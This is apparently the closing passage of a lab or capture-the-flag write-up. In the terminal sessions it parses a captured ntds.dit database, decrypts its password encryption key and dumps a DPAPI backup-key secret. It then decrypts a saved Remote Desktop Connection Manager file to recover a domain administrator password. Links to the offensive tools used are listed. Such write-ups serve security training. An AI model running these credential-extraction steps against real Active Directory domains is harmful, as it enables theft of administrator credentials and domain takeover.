(venv) puck@edge-meppel:~/ntdissector$ ntdissector -ntds /home/puck/ntds.dit -system /home/puck/SYSTEM -outputdir /tmp/test -ts -f all
[2024-08-30 15:25:27] [-] Couldn't load cache file /home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json -> [Errno 2] No such file or directory: '/home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json'
[2024-08-30 15:25:27] [*] Building the schemas, please wait...
[2024-08-30 15:25:29] [*] PEK # 0 found and decrypted: feab48d5655b005f0fed603c166c587f
[2024-08-30 15:25:29] [*] Filtering records with this list of object classes : ['all']
[2024-08-30 15:25:29] [*] Ignoring records marked as deleted
100%|████████████████████████████████| 3747/3747 [00:00<00:00, 7281.52rec./s]
[2024-08-30 15:25:30] [*] Finished, matched 3708 records out of 3747
[2024-08-30 15:25:30] [*] Processing 3708 serialization tasks
100%|████████████████████████████████| 3708/3708 [00:17<00:00, 192.28rec./s]
(venv) puck@edge-meppel:~/ntdissector$

(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$ cat secret.json | jq
{
  "lastSetTime": "2024-04-10T23:33:43.254871+00:00",
  "priorSetTime": "2024-04-10T23:33:43.254871+00:00",
  "dSCorePropagationData": "1601-01-01T00:00:00+00:00",
  "isCriticalSystemObject": 1,
  "showInAdvancedViewOnly": 1,
  "distinguishedName": "CN=BCKUPKEY_e6630be8-09ee-4a28-bcb1-e725e585d832 Secret,CN=System,DC=KLENDATHU,DC=VL",
  "objectClass": [
    "secret",
    "leaf",
    "top"
  ],
  "replPropertyMetaData": "01000000000000000c000000000000000000000001000000d7b2271c03000000c98b69a9c485a44f8204cfa32ce1e18e2<redacted>0010500000000000515000000bb79422646d3736071c6002d00020000",
  "objectGUID": "2a015493-fc08-40bc-b15e-d6936ba6bc59",
  "objectCategory": "CN=Secret,CN=Schema,CN=Configuration,DC=KLENDATHU,DC=VL"
}
(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$
rdgdecrypt
(venv) puck@edge-meppel:~$ python3 ./rdgdec.py ./jenkins.rdg --masterkey /home/puck/Roaming/Microsoft/Protect/S-1-5-21-641890747-1618203462-755025521-1110 --sid S-1-5-21-641890747-1618203462-755025521-1110 -k ./pvk.key
[+] Profile: KLENDATHU\administrator
    Username: administrator
    Domain:   KLENDATHU
    Password: @@M<redacted>s@@
-------------------------------------------------------------------------------
[+] Decrypted 1 out of 1 credentials
What a ride!

Used links:
https://github.com/ar0x4/impacket.git
https://github.com/synacktiv/ntdissector
https://github.com/tijldeneut/dpapilab-ng